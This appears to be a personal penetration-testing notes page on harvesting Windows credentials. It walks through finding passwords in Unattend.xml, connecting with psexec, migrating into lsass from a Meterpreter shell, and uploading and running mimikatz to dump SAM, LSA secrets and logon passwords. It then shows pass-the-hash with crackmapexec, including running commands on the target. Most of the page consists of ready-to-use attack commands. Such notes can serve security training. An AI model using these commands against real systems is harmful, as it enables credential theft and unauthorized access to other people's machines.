rootđź’€bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!

View on GitHub

Windows Password Hashes

The windows OS stores hashed user account passwords locally in the SAM(Security Accounts Manager) database

Elevated/Administrative privileges are required in order to access and interact with the LSASS process

In modern version of windows the SAM database is encrypted with a syskey

Searching for passwords in windows configuration files

This is typically done through the use of the “Unattended Windows Setup utility”, which is used to automate the mass installation/deployment of Windows on Systems

The unattended windows setup utility will typically utilize one of the following configuration files that contain user account and system configuration information

  1. “C:\Windows\Panther\Unattend.xml”
  2. “C:\Windows\Panther\Autounattend.xml”

As a security precaution, the passwords stored in the unattended windows setup configuration file may be encoded in base64

To search for the xml file

search -f Unattend.xml

the file is located in

C:\Windows\Panther

Download it to your machine

Download Unattend.xml

From here you can get a username and password. You can go ahead and use psexec to connect to the creds you found

psexec.py Administrator@10.10.10.10   //This requires a password

Dumping Hashes with Mimikatz

Mimikatz is a windows post exploitation tool. It can be used to extract hashes from “lsass.exe” process memory where hashes are cached

If you are on a meterpreter shell, you can utilize the mimikatz extension “kiwi”.

Mimikatz will require elevated privileges in order to run correctly

Migrate to the lsass.exe process

pgrep lsass
migrate 777

To use the kiwi extension

load kiwi

You can use the help menu to check for commands after loading the extension

help

To use the mimikatz executable, create a temp dir

cd C:\\
mkdir Temp
cd Temp
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe

open a shell session

shell

execute the mimikatz executale

mimikatz.exe

Check if you have appropriate privileges

Privilege::debug //privilege '20' ok means you've got privileges

To dump for the sam database

lsadump::sam

To dump lsa secrte

lsadump::secret

To display logon passwords

sekurlsa::logonpasswords

Pass The Hash Attack

This is an exploitation technique that involved capturing or harvesting NTLM hashes or clear-text passwords and utilizing them to authenticate with the target legitimately

Metasploit module PsExec

Crackmapexec

Those 2 tools above can be used for this attack.

So you can reconnnect to the machine with the user’s ntlm hash

crackmapexec smb 10.10.10.10 -u (username) -H "(NTLM hash)"

If this works, go ahead and execute a few command on it

crackmapexec smb 10.10.10.10 -u (username) -H "(NTLM hash)" -x "ipconfig"